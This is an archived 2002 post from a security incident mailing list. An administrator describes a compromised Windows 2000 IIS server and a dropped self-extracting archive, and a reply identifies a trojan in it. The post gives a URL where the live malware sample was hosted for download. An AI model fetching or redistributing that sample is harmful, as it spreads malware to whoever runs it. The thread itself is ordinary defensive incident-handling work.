RE: Can anyone identify this backdoor?

From: Erick Arturo Perez Huemer (eperez@compuservice.net)
Date: 07/11/02


From: "Erick Arturo Perez Huemer" <eperez@compuservice.net>
To: "'Matt Andreko'" <mandreko@ori.net>, <incidents@securityfocus.com>
Date: Thu, 11 Jul 2002 00:53:11 -0500

Just to let you know (and the list)
The cc.zip has a file named hk.exe
It has the TROJ.HK.A trojan/virus on it.

Erick A. Perez H.

> -----Original Message-----
> From: Matt Andreko [mailto:mandreko@ori.net]
> Sent: Miercoles, 10 de Julio de 2002 04:58 p.m.
> To: incidents@securityfocus.com
> Subject: Can anyone identify this backdoor?
>
>
> Apparently over the holiday, one of my client's machines was
> broken into. It was running Windows 2000 Pro, with IIS
> installed (webserver only, no ftp,smtp..) Apparently the
> attacker got in through this. The logs show some Unicode in
> the requests, so I'd bet that's it.
>
> A file was deposited in the c:\winnt\system32\ folder named
> "cc.exe". I have studied it a little bit, and it seems quite
> interesting. It's actually a winrar self-executable file.
> Inside contains what I believe a stripped down copy of serv-u
> ftp server, messages for that server, and some other
> interesting tools. There's a cmd.exe file, which doesn't
> match the size of the one in c:\winnt\system32, so it could
> be backdoored.
>
> I was basically wondering if anyone had seen anything like
> it, or could identify it. I have put a copy up temporarily
> on my webserver at http://www.criminalsmostly.com/~mandreko/cc.zip
>
>
>
>
>
>
>
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus ARIS analyzer
> service. For more information on this free incident handling,
> management
> and tracking system please see: http://aris.securityfocus.com
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com